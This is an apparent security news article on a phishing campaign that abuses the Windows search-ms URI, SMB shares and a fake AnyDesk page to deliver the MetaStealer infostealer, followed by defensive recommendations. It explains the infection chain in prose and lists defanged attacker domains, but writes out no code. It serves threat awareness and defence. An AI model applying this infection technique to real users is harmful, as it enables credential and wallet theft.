Threat Actors Exploit Windows Search in AnyDesk ClickFix Attack to Spread MetaStealer

In a novel twist on the year-long trend of ClickFix scams, threat actors have blended human-verification social engineering with the Windows search protocol to deliver MetaStealer, a commodity infostealer notorious for harvesting credentials and exfiltrating sensitive files.

While the attack superficially resembles classic ClickFix and FileFix techniques, its unique infection chain—from a fake AnyDesk installer to an MSI package disguised as a PDF—underscores the evolving sophistication of “fix” variants.

The attack begins when a target searching for the legitimate AnyDesk remote-access tool lands on anydeesk[.]ink/download/anydesk.html, a phishing page featuring a faux Cloudflare Turnstile human-verification prompt.

The page’s obfuscated JavaScript, once deobfuscated, redirects victims to verification.anydeesk[.]ink/reCAPTCHA-v2.php, where clicking the verification box triggers a Windows File Explorer hack rather than a simple PowerShell or Run dialog execution common in ClickFix campaigns.

Instead of instructing users to paste code into the Run dialog (ClickFix) or File Explorer address bar (FileFix), the phishing page leverages the search-ms URI scheme which displays the name for a custom search query as part of the search-ms URI protocol.

When victims click “verify,” their browser invokes Windows File Explorer and automatically opens a custom search query, as defined by the displayname parameter in the search-ms URI.

This query silently connects to an attacker-controlled SMB share, presenting the user with what appears to be a PDF called Readme AnyDesk.pdf.

Disguised LNK Shortcut Snags Hostnames

Behind the guise of a PDF lies a malicious Windows shortcut (LNK) file. When executed, the shortcut’s payload triggers two simultaneous actions: it silently downloads the legitimate AnyDesk installer via Microsoft Edge—likely to lull the user into believing a genuine application is installing—and fetches a so-called “PDF” from chat1[.]store into a temporary directory.

Crucially, the “PDF” installer uses the victim’s %COMPUTERNAME% environment variable to craft its download URL, thus harvesting the hostname without pre-configuring each campaign.

Analysis of the chat1[.]store server, accessed via a curl user agent, revealed the full MSI package. Inside, a CustomActionDLL and a compressed CAB archive (Binary.bz.WrappedSetupProgram) unpack two key malicious components: a cleanup JavaScript (1.js) and ls26.exe, the MetaStealer dropper.

The “solution” is copying and pasting a command fed to victims via an attacker-controlled prompt, which quietly kicks off the attack chain.

Protected with Private EXE Protector, ls26.exe behaves identically to known MetaStealer samples, scanning for browser credentials, crypto-wallet files, and document stores before exfiltration.

Although this attack shares common elements with traditional ClickFix and FileFix lures—namely, social engineering prompts disguised as CAPTCHA—the shift to search-ms URIs and SMB shares marks a significant evolution.

Unlike ClickFix, which coaxes users to paste commands into the Run dialog, and FileFix, which exploits the File Explorer address bar, the new variant entirely bypasses user suspicion by delivering a familiar Remote Desktop installation alongside a malicious installer.

Defensive Measures and User Education

Organizations that have mitigated classic ClickFix threats by disabling or restricting the Windows Run dialog may still be vulnerable to search-ms-based lures. To bolster defenses:

• Enforce strict application whitelisting to block unauthorized script execution and MSI installations.
• Monitor and restrict Windows protocol handlers such as search-ms from accessing untrusted SMB shares.
• Educate users to question unsolicited CAPTCHAs or verification prompts that request any level of command execution or file opening.
• Deploy endpoint detection rules to flag unexpected launches of msiexec.exe, cmd.exe downloads, and SMB share connections to unfamiliar hosts.

As threat actors continue to refine “fix”-style attacks, blending legitimate features with social engineering will remain a potent evasion tactic. Vigilant user training and layered technical controls are essential to detect and disrupt these evolving infection chains before they deliver infostealers like MetaStealer.

IOCs

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.